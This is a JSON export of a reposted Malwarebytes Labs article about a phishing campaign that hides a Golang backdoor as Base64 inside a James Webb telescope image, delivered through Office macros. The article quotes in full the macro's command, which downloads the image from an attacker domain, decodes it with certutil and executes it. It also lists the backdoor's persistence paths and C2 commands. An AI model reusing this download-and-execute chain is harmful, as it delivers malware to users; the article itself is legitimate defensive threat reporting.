{"id":19990,"date":"2022-08-31T16:10:47","date_gmt":"2022-09-01T00:10:47","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2022\/08\/31\/news-13723\/"},"modified":"2022-08-31T16:10:47","modified_gmt":"2022-09-01T00:10:47","slug":"news-13723","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/08\/31\/news-13723\/","title":{"rendered":"James Webb telescope images used to hide malware"},"content":{"rendered":"<p>A rather unique approach to spread malware using the popularity of the James Webb telescope images has been identified by the <a href=\"https:\/\/www.securonix.com\/blog\/golang-attack-campaign-gowebbfuscator-leverages-office-macros-and-james-webb-images-to-infect-systems\/\" target=\"_blank\">Securonix threat research<\/a> team.<\/p>\n<p>The malware is being spread by a phishing campaign&nbsp;that includes&nbsp;a Microsoft Office attachment. Similar to traditional Office macros, the template file contains a Visual Basic script that will initiate the first stage of code execution for this attack once the user enables macros. Through several steps the actual payload turns out to be a Golang binary file that acts as a backdoor.<\/p>\n<h2>Golang<\/h2>\n<p>Golang or GO, which is the actual name of Golang, is an open source programming language. Some threat actors have started writing malicious code using cross-platform programming languages like Golang, Python, and Rust, with the aim of&nbsp;penetrating and encrypting as many systems as possible. This allows their malware to run on different combinations of operating systems and architectures.<\/p>\n<h2>VBA Macro<\/h2>\n<p>In this campaign, when the document is opened, a malicious template file is downloaded and saved on the system. The template includes the functions <strong>Auto_Open<\/strong>, <strong>AutoOpen<\/strong>, and <strong>AutoExec<\/strong>. The malicious VBA macro code is set to be auto executed once macros are enabled.<\/p>\n<p>VBA macros should be disabled unless there are compelling reasons not to. As we explained when <a href=\"https:\/\/www.malwarebytes.com\/blog\/news\/2022\/02\/microsoft-takes-macros-out-of-the-equation-for-five-office-apps\">Microsoft disabled macros for five Office apps<\/a>, the Mark of the Web (MOTW) can be circumvented by malware authors.<\/p>\n<h2>Certificate<\/h2>\n<p>The obfuscated code in the macro executes the following command:<\/p>\n<p><strong>cmd.exe&nbsp; \/c cd c:users{username}appdatalocal &amp; curl http:\/\/www.xmlschemeformat.com\/update\/2021\/office\/oxb36f8geec634.jpg -o oxb36f8geec634.jpg &amp; certutil -decode oxb36f8geec634.jpg msdllupdate.exe &amp; msdllupdate.exe<\/strong><\/p>\n<p>This command will download a file named OxB36F8GEEC634.jpg, use certutil.exe to decode it into a binary called msdllupdate.exe and then finally, execute that binary.<\/p>\n<p>But, if you&nbsp;open the .jpg with any of the programs that are normally associated with JPG files, you will see this image:<\/p>\n<p style=\"margin: 0cm 0cm 8pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.malwarebytes.com\/blog\/news\/2022\/08\/easset_upload_file14594_234668_e.png\" alt=\"oxb36f8geec634.jpg\" width=\"775\" height=\"795\" style=\"display: block; margin-left: auto; margin-right: auto;\" \/><\/p>\n<p>But, remember when we talked about <a href=\"https:\/\/www.malwarebytes.com\/blog\/news\/2022\/08\/explained-steganography\">steganography<\/a>? Images can be used to hide information, or an executable in this case.<\/p>\n<h2>Obfuscation<\/h2>\n<p>The image contains malicious Base64 code disguised as an included certificate. Base64 is an encoding scheme designed to carry data stored in binary formats across channels that only reliably support text content. Base64 is particularly prevalent on the World Wide Web where one of its uses is the ability to embed image files or other binary assets inside textual assets such as HTML and CSS files.<\/p>\n<p>In the command we saw how the legitimate certutil was used to decode the so-called certificate and create a binary called msdllupdate.exe.<\/p>\n<h2>Payload<\/h2>\n<p>The malware payload copies itself into <strong>%localappdata%microsoftvault<\/strong> and creates and executes a batch file in the same folder called update.bat. The .bat file creates the directory <strong>%LOCALAPPDATA%microsoftwindowsMsSafety<\/strong> and adds another copy of <strong>msdllupdate.exe<\/strong> to that folder. For this file, a startup entry is created in the registry to achieve persistence.<\/p>\n<p>The malware connects to a C2 server and goes into an infinite loop waiting for commands from the C2. Three commands are supported:<\/p>\n<ul>\n<li><strong>sleep<\/strong> to change timeout between C2 requests<\/li>\n<li><strong>timeout<\/strong> to change timeout parameter in nslookup request<\/li>\n<li>all other commands will be executed with &ldquo;<strong>cmd.exe \/c<\/strong>&rdquo;<\/li>\n<\/ul>\n<p>Basically this allows the threat actor to execute arbitrary code on the affected machine.<\/p>\n<h2>Mitigation<\/h2>\n<p>Malwarebytes customers were protected right from the start since Malwarebytes detected the Msdllupdate.exe file without requiring any updates. Our detection engine identified it as malicious by using our <a href=\"https:\/\/www.malwarebytes.com\/blog\/detections\/generic-malware-suspicious\">generic criteria for suspicious files<\/a>.<\/p>\n<p style=\"margin: 0cm 0cm 8pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.malwarebytes.com\/blog\/news\/2022\/08\/easset_upload_file54589_234668_e.png\" alt=\"Malwarebytes blocks Generic.Malware\" width=\"469\" height=\"307\" style=\"display: block; margin-left: auto; margin-right: auto;\" \/><\/p>\n<p>The Malwarebytes web protection engine will also block traffic to the <a href=\"https:\/\/www.malwarebytes.com\/glossary\/cc\">C2 servers<\/a> involved in this campaign and the domains hosting malware files.<\/p>\n<p>Stay safe, everyone!<\/p>\n<p><a href=\"https:\/\/www.malwarebytes.com\/blog\/news\/2022\/08\/james-webb-telescope-images-used-to-hide-malware\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<table cellpadding='10'>\n<tr>\n<td valign='top' align='left'>\n<p>Categories: <a href='https:\/\/www.malwarebytes.com\/blog\/category\/news' rel='category tag'>News<\/a><\/p>\n<p>Categories: <a href='https:\/\/www.malwarebytes.com\/blog\/category\/threats' rel='category tag'>Threats<\/a><\/p>\n<p>Tags: Msdllupdate.exe<\/p>\n<p>Tags:  macros<\/p>\n<p>Tags:  James Webb<\/p>\n<p>Tags:  certutil<\/p>\n<p>Tags:  Golang<\/p>\n<p>Tags:  base64<\/p>\n<p>Tags:  steganography<\/p>\n<p>Tags:  OxB36F8GEEC634.jpg<\/p>\n<p>In a recent malware campaign, images from the James Webb telescope were used to hide malware.<\/p>\n<table width='100%'>\n<tr>\n<td align=right>\n<p><b>(<a href='https:\/\/www.malwarebytes.com\/blog\/news\/2022\/08\/james-webb-telescope-images-used-to-hide-malware' title='James Webb telescope images used to hide malware'>Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel='nofollow' href='https:\/\/www.malwarebytes.com\/blog\/news\/2022\/08\/james-webb-telescope-images-used-to-hide-malware'>James Webb telescope images used to hide malware<\/a> appeared first on <a rel='nofollow' href='https:\/\/www.malwarebytes.com'>Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[20063,27411,10719,27410,10796,27409,32,27412,11039,10438],"class_list":["post-19990","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-base64","tag-certutil","tag-golang","tag-james-webb","tag-macros","tag-msdllupdate-exe","tag-news","tag-oxb36f8geec634-jpg","tag-steganography","tag-threats"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19990","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=19990"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19990\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=19990"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=19990"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=19990"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}